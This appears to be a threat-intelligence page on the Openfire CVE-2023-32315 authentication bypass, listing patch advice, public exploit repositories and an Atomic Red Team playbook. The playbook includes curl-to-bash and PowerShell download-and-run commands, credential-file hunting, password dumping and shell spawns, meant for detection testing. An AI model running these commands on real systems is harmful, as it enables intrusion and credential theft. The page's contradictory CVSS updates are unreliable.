CVE-2023-32315
Overview
This vulnerability is a path traversal flaw in the Openfire administrative console's setup environment. The root cause is improper validation of input paths in the web-based setup interface, allowing traversal sequences to access unauthorized resources. The affected component is the Openfire Setup Environment within the administrative console, impacting versions from 3.10.0 onward released since April 2015.
Vulnerability Description
Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice.
Impact
An attacker can gain unauthorized access to the Openfire Administration Console without any authentication or user interaction. This access enables viewing and potentially manipulating administrative functions and sensitive configuration data. The unauthorized console access undermines system integrity and confidentiality, potentially leading to further exploitation or lateral movement within the affected environment.
Solution
Users should upgrade Openfire to versions 4.7.5 or 4.6.8 or later, where this vulnerability has been patched. Further improvements are planned for the upcoming 4.8.0 release. Detailed patch and mitigation instructions are available in the official GitHub security advisory GHSA-gw42-f939-fhvm at https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Openfire XMPP server arises from a path traversal flaw within its administrative console, specifically in the web-based setup environment. This weakness allows an unauthenticated user to exploit the setup environment of an already configured Openfire instance. By manipulating the input parameters, an attacker can traverse the file system and gain access to restricted administrative pages that are typically reserved for authorized users. The flaw affects all versions released since April 2015, making it a significant concern for organizations that have not updated their installations. The vulnerability has been addressed in the latest versions, which include critical patches to prevent such unauthorized access.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. An unauthenticated user can leverage the Openfire Setup Environment, which is intended for initial configuration, to gain access to sensitive administrative functionalities. This could include the ability to modify user permissions, view sensitive data, or even disrupt services. Exploitation could occur through simple HTTP requests, making it accessible to individuals with minimal technical expertise. Scenarios could range from a malicious insider attempting to manipulate the server to an external attacker probing for weak configurations, highlighting the need for robust security measures around administrative interfaces.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Openfire for internal communications. Unauthorized access to administrative functions could lead to data breaches, unauthorized changes to user accounts, or even service disruptions. The business risks associated with such incidents are multifaceted, including potential regulatory penalties, reputational damage, and loss of customer trust. Furthermore, the financial implications of remediating an incident can be significant, particularly if sensitive information is compromised. Organizations must recognize that the consequences of an exploit can extend beyond immediate operational impacts to long-term strategic challenges.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched versions of Openfire as soon as possible. Regularly monitoring for updates and applying security patches is essential in maintaining a secure environment. In cases where immediate upgrades are not feasible, organizations should implement strict access controls to limit exposure to the administrative console. Network segmentation can also be employed to isolate the Openfire server from untrusted networks, reducing the likelihood of an external attack. Additionally, employing intrusion detection systems can help identify unusual access patterns that may indicate exploitation attempts.
In conclusion, the path traversal vulnerability in Openfire presents a significant threat to organizations utilizing this XMPP server. The ease of exploitation combined with the potential for severe consequences necessitates immediate attention from system administrators. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves to defend against such vulnerabilities. Proactive measures, including timely upgrades and robust security practices, are essential to safeguarding sensitive administrative functions and maintaining the integrity of communication systems.
Recent developments in the CVE-2023-32315 vulnerability reveal a marked escalation in the exploit landscape, as evidenced by the emergence of multiple new proof-of-concept tools publicly available on prominent code-sharing platforms. This expansion in exploit availability has directly influenced the reassessment of the CVSS score, which has been elevated from 7.5 to 8.6, reflecting a higher severity level. Our CSURFACE threat intelligence indicates that these tools lower the barrier to exploitation, enabling a broader range of threat actors to target Openfire servers with greater ease and potentially bypass authentication controls to access administrative functions. Although ransomware usage linked to this vulnerability remains undetermined, the increased exploit accessibility heightens the risk of opportunistic attacks that could compromise critical communication infrastructure. The EPSS score remains high and stable, reinforcing the persistent threat. Collectively, these factors necessitate an elevated risk posture for organizations running affected Openfire versions, as the likelihood and impact of successful exploitation have grown significantly.
Update 2 — July 04, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2023-32315, accompanied by the emergence of multiple new publicly available proof-of-concept exploits on prominent code-sharing platforms. This increased activity underscores a growing attacker interest and capability to leverage the Openfire administrative console’s path traversal vulnerability for unauthorized access. Although the CVSS score was adjusted downward to 7.5, reflecting refined impact assessments, the persistent maximum EPSS score signals sustained exploitability and high likelihood of attack attempts. The proliferation of diverse exploit variants, including those enabling remote code execution, broadens the attack surface and complicates defensive postures. Consequently, organizations operating vulnerable Openfire instances face an elevated threat environment characterized by more frequent and sophisticated exploitation efforts, necessitating heightened vigilance despite the slight CVSS recalibration.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Igniterealtime | Openfire | All |
cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
|
|
|
Igniterealtime | Openfire | All |
cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Openfire authentication bypass with RCE plugin
exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315
|
- | Unknown | - | View |
GitHub PoCs (14)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
tangxiaofeng7/CVE-2023-32315-Openfire-Bypass
rce
|
tangxiaofeng7 | 142 | 34 | 2023-06-14 | View |
|
miko550/CVE-2023-32315
Openfire Console Authentication Bypass Vulnerability with RCE plugin
|
miko550 | 57 | 12 | 2023-06-18 | View |
|
K3ysTr0K3R/CVE-2023-32315-EXPLOIT
A PoC exploit for CVE-2023-32315 - Openfire Authentication Bypass
|
K3ysTr0K3R | 14 | 6 | 2023-12-15 | View |
|
Ap0dexMe0/CVE-2023-32315
Perform With Massive Openfire Unauthenticated Users
|
Ap0dexMe0 | 6 | 4 | 2023-07-02 | View |
|
ThatNotEasy/CVE-2023-32315
Perform With Massive Openfire Unauthenticated Users
|
ThatNotEasy | 6 | 4 | 2023-07-02 | View |
|
izzz0/CVE-2023-32315-POC
CVE-2023-32315-Openfire-Bypass
|
izzz0 | 5 | 1 | 2023-07-07 | View |
|
gibran-abdillah/CVE-2023-32315
Tool for CVE-2023-32315 exploitation
|
gibran-abdillah | 3 | 2 | 2023-08-31 | View |
|
5rGJ5aCh5oCq5YW9/CVE-2023-32315exp
|
5rGJ5aCh5oCq5YW9 | 2 | 1 | 2023-06-15 | View |
|
ohnonoyesyes/CVE-2023-32315
|
ohnonoyesyes | 0 | 1 | 2023-06-14 | View |
|
bryanqb07/CVE-2023-32315
|
bryanqb07 | 0 | 0 | 2024-09-05 | View |
|
asepsaepdin/CVE-2023-32315
|
asepsaepdin | 0 | 0 | 2025-01-30 | View |
|
CN016/Openfire-RCE-CVE-2023-32315-
Openfire未授权到RCE(CVE-2023-32315)复现
|
CN016 | 0 | 0 | 2023-10-10 | View |
|
shiyingzhencai/CVE-2023-32315-java7-
CVE-2023-32315(java7)
|
shiyingzhencai | 0 | 0 | 2025-12-21 | View |
|
pulentoski/Explotacion-CVE-2023-32315-Openfire
|
pulentoski | 0 | 0 | 2025-04-14 | View |
Threat Feed
10 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-32315 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/173607/Openfire-Authentication-Bypass-Remote-Code-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-32315 |